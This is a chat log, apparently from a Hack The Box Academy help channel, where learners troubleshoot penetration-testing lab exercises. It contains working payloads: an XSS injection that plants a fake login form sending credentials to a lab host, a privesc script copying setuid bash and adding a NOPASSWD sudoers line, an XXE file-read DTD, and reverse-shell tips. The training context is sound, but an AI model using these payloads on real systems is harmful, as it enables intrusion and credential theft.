#modules

yes

i did ||nc with source port but didnt work||

You can send me a DM.

its stuck on "Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 16:27 MSK"

Hello how are you ?

Good, just sipping coffee and messing around with stuff.

are you sure its not just taking its time? It takes a while to scan 65535 ports

Can you tell me if you encountered this problem in the Windowsprivesc module?

Ahah for me monster it’s good 😂

So you are having issues with that section?

Hum kernel exploit

You can send me a DM so I can see what you have done.

I tried 3 techniques and the first I got the hash but pass the hash does not work and the 3rd technique I get the Shell but impossible to make orders on meterpreter

Ok thx

Hello guys please I need help

on Attacking Common Services FTP

I’m trying to brute force the ftp with Medusa hydra and patator none are working

I assume you are attempting with the provided username and password lists in resources?

Yes

The username is robin

Give me a sec and I will spin it up and run it on my end.

ok thanks

this was the command i used medusa -u robin -P pws.list -h 10.129.102.202 -M ftp -n 2121

hello, i m having a problem with the xss phishing exercise if anyone can help, my payload works but i don't get creds

did u started php server on your pc?

guys it's assessment of sqlmap essentials, i got vector for attack and run sqlmap with tamper(blind based). But it gave me only ! as a content instead of an answer. Can u give me a hint?

no i used python http.server module, i can get http requests but no creds, here is proof that i can inject phishing form :

maybe you didnt write proper js part of the server?

why would I need that ?

your script should send cookies that it gets from site

this is phishing not cookie stealing

are you using default port for the hosting? Also have you checked the script that you are hosting is correct?

80

did you use the html example from the module?

i m simply using python3 -m http.server 80

ok so make sure the script you are hosting doesn't have mistakes and double check the malicious url that you generated

yeah ofcrs

'><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.132/><input type="text" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" value="Login"></form>');document.getElementById('urlform').remove();document.querySelector('h1')?.remove();</script><!--

been 20 minutes, is that normal?

I just tried it out with a php script and it works fine, it sent me the creds.

are you talking with me ?

you sent it to the /send.php page?

yeah, nothing happens

Sometimes. You can retry if you think its hanging

yes

what module is it?

Network Enumeration with Nmap

im gonna retry it using -v to see if it will get stuck

I haven't got to it yet so can't say. Shouldn't take that long imo

can you send it them to me if my payload is correct ? i m clueless here, perhaps regenerate new vpn

sure I DM

Hello there! Does anyone know if we have anything related to apache server in the academy? Much appreciated, thank you

Any additional insight would be appreciated. I just tested kerbrute with sshuttle, but no luck. Does kerbrute rely on something more than straight TCP/UDP access to port 88 (e.g. broadcasts or layer 2 communication)?

i did that, where does it show me the number of all tcp ports?

Apache is used in various modules. What exactly are you looking for?

Apache is used in various modules. What exactly are you looking for?

did you get the output?

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 09:06 CDT
Nmap scan report for 10.129.2.49
Host is up (0.0087s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
31337/tcp open Elite

that

Today I worked on the topology machine. For this you need to know the structure of apache and how it's configured. I know I can look online for this, outside htb, but I was curious if we have anything at all for apache itself, like searching for config files etc

no, there is no module that explains to you how Apache or other webservers can/should be configured

thanks, I lacked moving forward because of this, I had to look at guidance for some tips. Either way, lesson learned. Thank you! 🙂

so how many are there?

do i add them up?

you count them

OHHH LOLL, tyyyy

Hey you can DM me.

ok

nmap -sC 10.129.132.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 17:33 MSK
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.14 seconds

why is it saying "host seems down"

use -Pn flag

Your ICMP ping got blocked by firewall

host is not respo ^

If I wireshark my ligolo interface and port scan the DC I see exactly what I would expect (e.g. a TCP 3 way handshake). If I run kerbrute, however, I don't see any traffic. It's like kerbrute is using the wrong interface??? And I don't see any options to adjust that behavior.

what module

that can mean a lot of things

Network Enumeration with Nmap

to make it work we use -Pn flage make nmap skip the ping check and make it assume the host is UP and proceed with scan directly

im not familiar with the tool but have you checked the man page? man kerbrute | grep -i "int*"

read the module its mentioned there

use -sn on it to check if its actually up

don't hit the machine directly read through the module

yeah most of the time

nmap -sn 10.129.132.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 17:40 MSK
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.00 seconds

alr lemme read it

are u on the vpn?

yep

try with sudo

command is running so it has nothing to do with the sudo

Are there even man pages for kerbrute? They're not available on my system of the system provided by the lab.

need to clear the concept.

Oh, not familiar with the tool.. no, I don't think there are man pages. No mention of an interface flag in the github.

i see, jsut checked the repo looks like it s -h you may need to -h each option for its sub help.

wym

Right. Yeah there isn't an interface option AFACT.

have you tried a canonical kerbrute cmd to see if you're getting any output expected as a sanity check?

or one you expect to work

a, simple one

sorry *module

oh, bro didnt even read first

I know kerbrute works if I run it on the provided host in the LAB environment. I don't understand why I can't use it through a pivot if TCP/UDP are open as verified by nmap. Wiresharking seems to reveal the traffic is being sent on a wrong interface or not adhering to routes. It's weird.

I would think running kerbrute through a proxy would be important because it's an early first step to establishing a next foothold.

are you using proxychains? is it outside the scope of the lab?

may want to just go at it the way the lab guides, then come back for the more advacned stuff after

I'm not using proxychains. Either sshuttle or -- even better -- ligolo where full TCP/UDP are available.

i believe you can set proxy options with nmap if that helps

yea, again, nmap isn't the problem.

Nah, as far as I recall, it just abuses the kerberos pre-auth, but I could be mistaken.

did you set proxy env vars in your terminal? i have to do this with burp

I wouldn't expect proxy environns are necessary when I'm routing. IDK if kerbrute adheres to any environmental variables like that. I don't see any mention in the docs.

certain certs may be required to decrypt encrypted traffic via proxy as well, keep that in mind.

export http_proxy=ip:PORT export https_proxy=ip:PORT

yes but if you're proxying thru terminal cmds the terminal may need them not kerbrute

not sure perhaps someone more familiar can give some advice

I'll have to try a traditional SOCKS proxy later. I tend to think sshuttle or ligolo are every bit as good and better, but maybe proxychains or setting the proxy in envions is the ticket.

https://github.com/ropnop/kerbrute/issues/32

Thanks, good find. That might have some insight to chew on.

…

Wrong channel. You can try elsewhere. This is for HTB Academy Modules. If you can't see other channels go to #welcome and follow the instructions.

Try #programming

Trying to spawn a target in academy and it is just spinning. Is anyone else having issues?

…

Is this channel for asking questions when stuck with a htb academy task?

yes

Thank you for the fast reply

Are you talking about the new job path, Active Directory Penetration Tester?

A cert is confirmed to be released soon so yes

yes

I am currently working through the "Information Gathering - Web Edition" Module and trying to solve the challenges for the Skills Assessment Chapter.

I am stuck with the Question " What is the API key in the hidden admin directory that you have discovered on the target system? "

I did add the shown IP with the vhost domain to the /etc/hosts file and am able to curl the site to receive the page.

But when trying to look for further directories or subdomains I am unsuccessful.

I tried gobuster dir -u http://inlanefreight.htb:<portnumber> -w <path-to-wordlist>

I also assumed that I know that the admin directory is available and tried to curl the http://inlanefreight.htb:<portnumber>/admin/robots.txt without any success as well

Any tips?

try to enumerate further

why you assume there is an admin directory?

sorry for asking, but what do you mean by further?

if dir, and subdomain doesn't work is there anything else in the module which you have yet to try?

Because the question mentions a hidden admin directory, that has been discovered

yes, but that doesn't necessarily mean the admin directory is named "admin"

keyword "hidden"

Good points, thank you both. I will try again and see what I might have missed

he is not there yet

So I spun up my lab and established a pivot through an Ubuntu host with sshuttle and then ran Kerbrute against a DC on an internal network and received accurate results. Not sure why it isn't working when you try it, but I just don't want you to think it doesn't work and not run it when you should.

can anyone help with file upload vulns skill assesment

just a tiny hint as to how to find the place files are uplaoded

TINY hint please

ik which one

but it only saysa "only images are allowed"

do i need to fuzz for the php?

cuz i thought it was on script.js

gotcha

thats all i need thank you

sry

Please, no spoilers for modules over Tier 0

@hexed lintel wait... how can i do that if i dont get any response to it?

Take it to DM. Not here.

can i dm you dollarboysushil?

sry

ok

It's said so often here regarding public spoilers regarding modules over Tier 0

You can't not know by now.

it is definitely to make you understand that sometimes our selected wordlist won't really bear any fruits

#welcome

Thanksssss!!!

For the Attacking Web Applications with Ffuf module I am one the question: One of the pages you will identify should say 'You don't have access!'. What is the full page URL? I found the private sub domains and am getting no where and I triple checked my /etc/hosts file: for some reason I can't reach my any of my domains

you remember to use the right port?

I switch the last 2 numbers on the port, thx

Hi. Im using the comand ss -l -4 | grep -v 127.0.0.1 | wc -l
For the question of the linux fundamentals module: How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

But i dont understand what is wrong

I know I have no idea which section of that module this is from, so I recommend providing more information as it can help someone drill down exactly where you are in your learning.

Anyone got any idea about this #modules message ?

Filter contents in the linux fundamentals module

Ah, there are a few ways to do this one. I used netstat.

Thank you so much for the sanity check! This is your lab, not an HTB thing?

Time for me to spin up a couple more virtuals if so... Also so weird I'm not having luck.

I would suggest re-reading the question and being more explicit with what you are using with grep. If you are still unsure after poking around, feel free to DM.

Yeah that's my home lab that I mess around with.

You can send me the lab you tried it on and when I have some time, I will check it out on my end.

Ad enumeration & attacks > initial enumeration of the domain.

If you've got the time I'd love to know if I'm missing something.

Tier 2 module, don't post content that may spoil for others. Be vague asking for advice on such things.

Did this recently if you want to dm me.

Oh my god read the chat

My bad, noted.

If you want advice on modules above Tier 0, then mention the module / section, and someone might reach out in DMs

Module: Linux Privilege Escalation
Section: Logrotate
Link to section: https://academy.hackthebox.com/module/51/section/1589

Having trouble with the question at the end of the section (can't say more without revealing details). My DMs are open, would appreciate any help. Thanks.

Did anyone solve "Attacking Common Services - SQL Databases"?

@hard matrixyou can write again what you seid.

Thank you 🙂

from what i saw you're just assigning $cmd to a value but not doing anything with it

we can't ask nonspecific questions as long as we dont directly include module material?

Sorry friend. We will do better 🙂

For modules over Tier 0, generally mentioning the module and section you are struggling with, and a vauge description of the trouble you are having without providing screenshots, CLI output, etc etc, whatever could be considered as spoiling the steps for others is fine

Otherwise I'd advise asking for DMs from someone that is willing to provide you with advice

Advice

There's a big difference between providing a nudge in the right direction, and flat out providing the answer

absolutely

Take it to DMs @forest gust

AAAAAAAAAAAH

https://tenor.com/view/this-is-fine-gif-24177057

lol moderating these chats has got to be a nightmare

😅

🫡

Not a moderator, but try to keep an eye on things now and again

Love the HTB community, but I also need to watch out for the companies best interests regarding our content and services 🙂

I just spun it up and I am not having an issue running it. I can DM a screenshot if you'd like.

I appreciate the offer. I got through but my issue is why kerbrute won't work on my attack host; won't go through sshuttle or ligolo. If you have insight, drop some wisdom.

@forest gust you can feel free to dm me the link to the mod you're working on, i think i did this a couple weeks ago but it looks like you should read the module more and see exactly what the lesson is guiding you to do, the screenshot you posted suggested you're supposed to be modifying that $cmd line in a POC script from what i saw (could be wrong)

there's lots of ways to execute and retrieve a revshell on a box

Sure, send the screen. I really appreciate the check. I'm really losing my marbles over this one 😅

No issue
in my experience in the first place kerbrute can be unstable but that's a pretty non-specific unhelpful non-answer
also I prefer chisel :^)

Sent

i'm trying SSH for Windows: plink.exe i already downloaded openvpn and ssh to the ubuntu using plink and downloaded proxifier but i can't RDP to the windows host

What do you mean by "you can't" ?
Be more specific with the issue, error message etc...

"remote desktop can't connect to the remote computer for on of the reason"

1. remote access to the server is not enabled
2. the remote computer is truned off
3. the remote computer is not available on the network

Give me a sec I open the module

Ah yeah this one was a bit*& haha
Check that after adding the SOCKS proxy in Proxyfier, you actually see it in the list of existing proxies if you do as if you were to add a second one

Because when I did it, the server was disappearing for some reason, and so I was under the impression I had a proxy set up, when I hadn't

i went to the proxy server i can see it there like in the pic in the module i used ip 127.0.0.1 and port 9050 and socks4

i'm already ssh to the ubuntu machine using plink -ssh -D 9050 ubuntu@10.129.202.64

there's check feature in proxifier i ran it get an error saying testing failed

[25:04] Testing Started.
Proxy Server
Address: 127.0.0.1:9050
Protocol: SOCKS 4
Authentication: UserID only

[26:13] Starting: Test 1: Connection to the Proxy Server
[26:13] IP Address: 127.0.0.1
[26:13] Connection established
[26:13] Test passed.
[26:13] Starting: Test 2: Connection through the Proxy Server
[26:13] Connection to www.google.com:80 established through the proxy server.
[26:20] Error : connection to the proxy server was closed unexpectedly.
Please make sure that the target host is a Web Server.
The error may also indicate that the proxy server is not operating properly.
[26:20] Test failed.
[26:20] Testing Finished.

This test doesn't matter, the target machine doesn't have access to Internet

so it will never pass that test

You try to RDP with mstsc.exe right?

yes using the windows machine ip "172.16.5.19"

Ok gimme a sec I try

maybe its the port ?

Cant RDP but can connect with Evil-winRm and ping it. changed 3 vpn servers with no results. Happened to anyone before?

ok

Hey in the exploiting web vulnerabilities in the thick client aplications section it has a SQL INJECTION SECTION in that we need to exploit with a or 1 = 1 payload i tries tonuse this payload in the traverse.jar executable file which we used to download a fatty server jar file to the desktop but it isnt showing me any thing can someone help me

hi

for the module Intrusion Detection With Splunk (Real-world Scenario) im struggling on the question Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the method through which the other process dumped lsass. Enter the misused DLL's name as your answer. Answer format: _.dll
my answer is ntdll.dll but that doesn t work

im stuck

@uneven cairn then I'd recommend breaking down each part of the command to see what exactly it is doing, and what the description of the command is trying to convey.

The man command has been used to look at the ASCII table. Perhaps use it to look at what the other command being used does.

Does Rubeus need Admin privileges to run properly?

You should be able to assume what the command does based upon the section content, but if you need to check it further then read the manual for the command.

echo $(tr '!-}' '"-~'<<<[) this is the part that confuses me

Hi. I am doing NMAP module on academy (https://academy.hackthebox.com/module/19/section/108) and flag I found is not accepted. Hint suggests to look for the flag in web service, but I think it is incorrect. Is anyone able to confirm that? Very simple module and it shouldn't take more then 5 min including spinning the target and pwnbox. I appreciate your time and help.

Yes.. read what I said man

chatgpt can break down every part of the command for you if you ask it

The module section literally says what it does 😐

Good luck

I had already done that before asking on discord, there is no need to assume that I didn't do it and that I'm being lazy

and there is no need to assume i knew that, chatgpt is a great resource people don't use and you never said you tried that first or what part of it you aren't getting even after a detailed explanation

part of asking the question is saying what you've already tried and you neglected to say that so its not on me

Yes, it says what it does in a summarized way and does not break down the command that it is using as it usually does, believe me I almost never have problems understanding a part of the code in HTB academy but in this part, it is not fair to say that "it says there" I mean yes it says but I seek to understand better I do not seek to ask unnecessary questions

If you can maybe be more specific about what it is that you're not understanding could help others. As far as that section goes it's basic string manipulation.

Have you read the manual for the other command used to see what it does?

Hello, I'm trying to do the fortress Akerva but couldn't access it, can anyone help me guide on this

Yeah

See #welcome and #fortresses

wrong channel friend

What does it do then @uneven cairn ?

Which chanell should I be for asking on lab fortress and other

Gubarz just linked them

I'm starting to lose my temper, I'll stop this conversation here, thanks for your help

What is the other command being shown in the content?

Ok, I'm trying to help, but it's very difficult with how you're communicating.

Best of luck, and sorry if I have caused you distress.

Don't worry goblin, I say this because it stresses me out not being able to understand well, I will take some time to analyze well what each command does and then I will continue with the module

Sometimes a break is all you need.

Bruv where u stuck?

I understand the frustration. It will click. A break is always good when you are stuck and frustrated.

If you think you have the correct flag and it is not being accepted, double check that the flag does not contain and extra spaces in the front and end of the flag. You can also refresh your screen and also double check that the lab machine is still running.

I see because I didnt verify yet so most channel not accessible, anyway thank you

???

Wanna send me your Academy ID to check what's up Vador?

I terminated both instances and refreshed page. started from beginning and made sure there is no spaces before or after. Flag is in a format HTB{xxxxxxxxxx}

You can send a DM if you'd like.

Ok, all I can say is that's not the correct answer for that question @steel trail

Given more context in DM

Did u edit the correct things?

why are you posting this here

this channel is for HTB Academy modules help

need sanity check for Advanced Deserialization Attacks: Skills Assessment

any one to DM ??

guys i'm trying to use rpivot i ran the server.py on my side and uploaded it and ran it on the pivot host and established a connecting but i can't reach the webpage i made sure i ran firefox with proxychains but its not working

try curl

i tried it with sshuttle and it worked but with rpivot its not working

The idea behind each tool is to give you an alternative, to break from the idea that there is only one correct tool

yeah i understand this why i want to use each one and learn how to use it if needed already found the flag i want to understand why its not working

didn't work i tried even ping sweep with nmap and didn't work

my suggestion is to get the answer to the question and move on, unless you wish to get deeper and find the root of the problem assuming that you have the necessary knowledge and tools to do so

i64 got aura

why am i pretty consistently getting a different response than what the example says when i try to curl inlanefreight.com with different flags

What module

https://academy.hackthebox.com/module/35/section/223 HTTP headers, im running curl -I https://www.inlanefreight.com but am missing a lot of headers that the example shows

with curl this is the error i get "curl: (35) gnutls_handshake() failed: An unexpected TLS packet was received."

HTTP/1.1 200 OK
Date: Sun, 22 Sep 2024 21:29:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Link: <https://www.inlanefreight.com/index.php/wp-json/>; rel="https://api.w.org/"
Link: <https://www.inlanefreight.com/index.php/wp-json/wp/v2/pages/7>; rel="alternate"; type="application/json"
Link: <https://www.inlanefreight.com/>; rel=shortlink
Content-Type: text/html; charset=UTF-8

this is what my output is btw

Pretty sure they just added fake info to the command

I don’t think the site even gives cookies

Hey guys im stuck on payloads and shells module

trying t do following command, i desactivated te antivirus but no succes

There are a lot of syntax errors..

i think that's meant to be ||run in Command Prompt||

my bad

How did you come up with that

it was a cmd command

precisely because of the syntax errors

Urgh nope, not getting involved

if you encoded the command you can run it without any issue

but yea syntaxes between the two shells aren't the same

but with powershell in the beginning it calls powershell to execute it no?

ow okej its pure syntax thats why it wasent working

right?

yea, you're running the command in powershell so it's going to process the syntax as powershell syntax

okej thanks you 🙂

Ah, Starting Point?

..

"Port Forwarding with Windows Netsh" is not working i ran netsh on the windows pivot machine and forwarded the connecting but when i try to rdp again to 172.16.5.19 i get an error saying broken pipe

i tried to rdp to the pivot with port 8080 didn't work also

sounds like something isn't setup correctly then

when i do the verifying port forward i get this output

Address Port Address Port

10.129.15.150 8080 172.16.5.19 3389

Kinda hard to troubleshoot this module from the outside

There’s a lot of commands that need to be setup

Command Injections
Bypassing Space Filters

It doesn't return any error nor the expected result, I expect an output to ls /home

the module says a great way to find out, remove all the injection characters and start adding them back 1 by 1 until it stops working, and that's how you can find which one it's being stopped at

these the steps i did:
1- connected to pivot host using xfreerdp
2- after that i ran netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.19

3- after that i tried to rdp to 172.16.5.19 and 10.129.15.150 and 10.129.223.253 with port 8080 and didn't work

these the steps mentioned on the module i'm missing something should i use proxychains ? because its not mentioned

It's already solved but in that module it should also work by character shifting, right?

FFFFFFFFFFFF

solved it it was the listenaddress my bad

please can i anyone help me , ls is not working on smb connection https://academy.hackthebox.com/module/147/section/1327

My turn to ask a question:

Try to RDP on the Intro to AD first lab machine, and getting this:
[19:18:38:575] [160747:160748] [ERROR][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex ERRINFO_LOGOFF_BY_USER [0x0001000C]

Already reset the target, no change.
I could RDP on all other modules target so far, first time I have an issue.

Could that be a connection issue / VPN ?
ping is pretty high to the machine but 💁‍♂️

any help is well appreciated.

Are you on "Initial Enumeration of the Domain"? I'm getting "login failed for diplay 0" myself where RDP had worked the last time I loaded the module. I'm terminating and respawning the lab now.

I'm in:
AD Administration: Guided Lab Part I

Sorry, I'm on AD Enumeration & Attacks.

Could it be they have issues overall on AD? Not sure how these are set up

Terminating and restarting my lab worked to resolve the issue. Sometimes, especially with AD labs that could involve multiple systems, it might take a few minutes after the lab is "spawned" for everything to startup.

Ok thanks will reset and wait 5-10min before trying to connect

I had the same issue and was going crazy.
My problem was that I was using an old password and didn't realize they changed up RDP passwords inbetween sections. So make sure you're using the right one.

Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found. i mean in /home is just the flag of the previous section

I am stuck on question 3 of LDAP module - Search Filters: Find the name of an account with a ServicePrincipalName set that is also a member of the Protected Users group. I am using :

Get-ADUser -Filter "adminCount -eq '1'" -Properties * | where servicePrincipalName -ne $null | select SamAccountName

but is not accepting it as answer

Can someone please tell me what's wrong?

I'm hitting errors on the cme module, the group policy object spider is erroring out saying NetBIOS timed out. It enumerated the shares then starts spidering and errors. I've added the host and domain to /etc/hosts but I'm lost now

For module Info-gathering web edition I'm stuck on the skill assement question What is the API key in the hidden admin directory that you have discovered on the target system? I have my /etc/hosts configured properly and ran multiple scans

this command should work

network problem, check your connection and try switching vpn servers

This one is working , kinf of, but cannot filter by SPN set: Get-ADGroupMember -Identity "Protected Users"

Pwnbox, reset both attacker and target machine, issue persists

Every other attack is working pre and post that one

filter by admin count

It is giving me the wrong account

yes the vpn server affects pwnbox connections too

how

I do not see that property

pretty sure the last command in the section should work

I'll check it in a bit

Thanks

ah ok you need to find the group then serch for the user

Indeed, lol

Maybe I need to pipe?

but I do not know

Find the group, then loop or pipe via Get-ADUser ?

Module: Linux Privilege Escalation
Section: Logrotate
Link to section: https://academy.hackthebox.com/module/51/section/1589

I'm working on the question at the end of the section.

I managed to rotate the log file but didn't receive a reverse shell.

This one should work: Get-ADGroupMember -Identity "Protected Users" | Get-ADUser -Properties * | where servicePrincipalName -ne $null | select name

but it is not

It is returning two accounts, one of them is the correct one

it's a bit of a pain to write cause you need to chain multiple cmdlets together

Get-ADGroup -Filter "adminCount -eq 1" | ForEach-Object { Get-ADGroupMember -Identity $_ | ForEach-Object { Get-ADUser -Identity $_ -Properties SamAccountName, MemberOf, servicePrincipalName | Where-Object { $_.servicePrincipalName -ne $null } } }

https://tenor.com/view/faint-fainting-catch-me-gif-19205245

dang, lol

Be sure to scan everything.

try using a suid binary or giving yourself sudo instead of making a shell because the window to catch it is very short

so yeah, I need a loop

yep

Jesus Christ. I would have never done that, not tonight.

Issue persists

I tried repeatedly ffuf, dnsenum, the scapy web scraper

Oh, so this should work since logrotate runs as root? Btw how do I check what logrotate runs as?

You can send me a DM to show what you have tried.

the service run as root iirc since it's a system service

Will do

idk worked for me before, see if you have better luck with netexec, otherwise contact support

do we need this type of skills or deep knowledge later on the module? or it is just showing the basics of filters? In other words, would I be ok just moving on? it seems like the next section will use PowerView? I just do not want to spend a lot of time learning PS Loops. If not needed for this module. I know it would be nice, but trying to be practical.

I see. So it always runs as root then.

Uhh, how do I do this? I tried running this as the payload, but it clearly didn't work since a bash binary didn't show in my home directory.

#!/usr/bin/bash

cp /usr/bin/bash /home/htb-student/bash
chmod +s /home/htb-student/bash

I even tried this script as the payload, but it didn't work.

#!/usr/bin/bash
echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers

I'm heading to bed, so if you are still stuck on this tomorrow, feel free to DM me.

Sounds good

if nothing happens that means the exploit isn't being triggered

I thought that may be the case, so I retraced my steps. I compiled the exploit on the target and I used the proper syntax, so I'm unsure what the issue could be.

you'll just need to understand how they work, for the most part you won't be writing much powershell scripts, there are other tools like powerview as you said and bloodhound, and also chatgpt to help you write commands

Funny, being using ChatGPT to assist myself on this question, lol...

Thanks @next bronze ... calling the night, appreciate your help.

did you find the file you can write into to trigger the rotation?

I managed to figure out what the problem is. I have the bash binary in my home directory now, but how do I execute it? 😅

bash -p

Thanks

These permissions looking a little weird. Is it cuz the setuid bit is set?

that doesn't look right, it should show as root

I added myself to the sudoers file but when I use su it prompts for a password and then fails even when I provide the password.

sudo?

?

sudo su

Ahh, nvm, that worked.

Don't know why I was trying just su.

I think in an earlier exercise for some weird reason sudo su wasn't working but just su was.

Netexec same issue, seems to happen with spidering so I've hit the helpline. Thanks for your help

Hello, I have a problem with the flag I found in SQLMAP - Skills Assessment. I've found the flag and I'm sure of it, but the flag in question doesn't work, or rather it seems that the other part of the flag is missing. Can you help me?

Just a question about Nmap options.
I noticed that these three: ' -Pn -n --disable-arp-ping ' are always used together. Is it done so to avoid sending too many unwanted packets (ICMP, ARP) which get sent to the target by default? And also to avoid Firewall/IDS from picking it up?

Please correct me if I am wrong

no, I have notes for them but I don't memorise them. if i work with ps daily maybe I will

tbf if you know how to read and have some knowledge just get chatgpt to write the base and you can debug or fix whatever dumb thing it might spit out

Hi,

Module: Web Attacks
Section: Advanced File Disclosure
Link to section: https://academy.hackthebox.com/module/134/section/1206

For error based XXE, I don't understand why we need parameter entities. Is it because we are trying to join the non-existing entity and and %file entity. Why is there an extra entity content? It is not even used anywhere.

Hello, i have a problem with spawning the target, yesterday I tried to spawn it and it still hasn't started. Is it possible to stop the launch and try again? (Skills Assessment - Advanced XSS and CSRF Exploitation)

Use what you find on Arturo's Desktop.

Module: Linux Privilege Escalation
Section: Miscellaneous Techniques
Link to section: https://academy.hackthebox.com/module/51/section/478

I'm working on the question at the end of the section.

I'm unable to execute the shell I compiled since the version of GLIBC present on the target is older than the version I compiled the program with. How can I tackle this issue?

i know the payload is right because did it work but sometimes work sometimes no, why? now is not working i can resend the request any times and still no working for somereason: ```
POST / HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://ip:port/
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: http://ip:port
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

ip=payload(the same paylaod works sometimes yes sometimes no)```

Where are you seeing an extra entity contet? I can't see it.

you're giving answers away you should delete that code

then how i would get help?

just articulate it

you're giving away content of the module and spoilers

either: compile on target, statically compile on your host gcc -static or compile in a vm with smilar or lower library versions

But if I compile on target then it'll no longer have the setuid bit for the root user?

The external DTD that we host is:

<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">```. It looks like a nested entity. But why is it necessary?

What's the -static option do?

content of the module? dude

Why not?

It may still have the setuid bit but the file owner will change, won't it?

I'll test it out and see.

Doesn’t the file permissions change on every machine?

The first line is defining the file we want to retrieve. The second one is throwing the error.

If you look at the example at the end of that section, it may make more sense to you.

The error is thrown when we reference non existing entity. Let me rephrase my question. Why does the DTD not look like:

<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error SYSTEM '%nonExistingEntity;/%file;'>```?

Not 100% I get what you're saying, but in this case because of the way that NFS is configured, if I copy a file owned by the local root user with the setuid bit set, it retains the permissions, and then I can use that to escalate privileges from the target. So, the permission doesn't change in this case, however, if I compile the program, it does change since I'm running gcc as the low-privileged user.

Ahh, seems I misunderstood your question. I don't get why that extra "> bit is there at the end.

Oh yeah for NFS some permissions stay. didn’t click the module

Does it have to be a compiled file?

Not just that. I mean generally we define XML external entity as <!ENTITY {entity_name} SYSTEM {entity_value}. But in this particular section, the entity_value itself looks like a new entity definition <!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>.

In this case, yes. I ended up taking Xre0uS's advicea and used the -static flag. It compiled.

I already tried with BASH scripts but that didn't work, it just ran with the low-privileged user's permissions.

Reverse shells didn't give root either.

Does embedding another entity definition as content of one entity mean that the content entity will be parsed dynamically?

I see the same pattern on the Blind Data Exfiltration as well where entity nesting is done.

Wait, how does it look like a new entity definition? There's no defining happening? It's just referencing/calling entities?

If we look at <!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">, it follows the format <!ENTITY {entity_name} SYSTEM {entity_value}. The entity_value in this case is <!ENTITY content SYSTEM '%nonExistingEntity;/%file;'> which again follows the same format! Why?

Okay, got it now. Sry, it's been a while for me and I haven't cleaned up my notes on a lot of parts yet.
I guess it's the nesting that allows for this to work?

@eager ledge if someone gives a proper answer, would you please ping me? Thanks.

Sure

Hello can someone please help in solving following question.

What is the name of the security standard for credit card payments that a company must adhere to? (Answer Format: acronym)

I tried all possible answers. None of them is correct. I don't know what is the issue.

read the module

i think its clearly mentioned in the module/section u just read

Please i beg you guys.

like really you have the answers on your screen and you are asking here

Can't spawn the Tomcat target on Attacking Common Applications 🥴 Does anyone have the problem?

i can give answer too but you still won't get it people connecting ideas, driving smart solutions.

<@&861185840277487616>

what is this at?

I did try harder. And just wow.

not u bro chill, someone was advertising here

i know

it's was in corner.

but whats power does it have?

well rule break, so when someone does smth against the rules, u report it like here

and u can assume what a mod will do when someone break the rules so

I install Privacy Badger for Firefox and the target spawned. I assume the HTBA page was trying to load a domain that blocked in my country. Maybe I'm wrong

In AD Enumeration & Attacks - Skills Assessment Part I we are supposed to upload all the tools needed?

Hey could someone help me in exploiting web vulnerabilities thick client applications after we download the fatty server. Jar file

someone can help me ?

feel free to dm me your steps and I will give you a nudge if needed 🙂

i'm cominf

g

ok

Got a rev shell on Attackin AD Skill Ass 1 but it doesnt return the output of the commands any ideas what could be wrong with the shell ?

Same commands on the web shell execute perfectly

Try a different revshell maybe?

Other payloads give me the followin page. Think this part of the set up ? Though the tools needed for SA are not in the webshell, or cant upload them although there is an upload option, catn find the file after beeing uploaded ( on the same directroy )

What question are you on?

I just used windows/shell_reverse_tcp from msfvenom

Only answered the first question of the assessment, let me try yours, one moment

How did you transfer the payload to the webshell?

Isn’t there just an upload function on the shell?

Yes, but after upload cant find the files I upload. Shouldnt they be on the same folder?

Fail to upload for exes

tbh, what i did backthen, is just got a powershell reverse shell

didnt upload anything

One liner?

try that ¯_(ツ)_/¯

yeah the base64 encoded one, from revshells.com

@shell ore I get this

Let me try this one

I dont know why the f your solution worked and all the other payloads didnt but thank you A LOT ❤️

lol, good luck w the rest

All the exes where uploaded here, dont know if i should have known that

sorry fo the delay. Unexpected friend gone to heaven. Yes, I did. The whole URL I should send to the victim.

Password Attack module, Skill Assessment - Hard Lab. When im connecting to david smb share with credentials i obtained via kdbx file, i can see "Backup.vhd" file. But i cant download it with "get Backup.vhd" for some reason. every time i get "smb: > get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: > getting file \Backup.vhd of size 136315392 as Backup.vhd SMBecho failed (NT_STATUS_INVALID_NETWORK_RESPONSE). The connection is disconnected now" message. any idea how to fix?

cuz the file is large, ig u can try mounting the share on ur box, then copy it locally (SHOULD work)

mount -t cifs //[server-ip]/[share-path] /[mount-point]

Colleagues I have C drive to share and take the sam base to my localhost and I have mounted the smbserver.py but I have the following error when moving the files the network path was not found -->Module Pivoting, Tunneling, and Port Forwarding

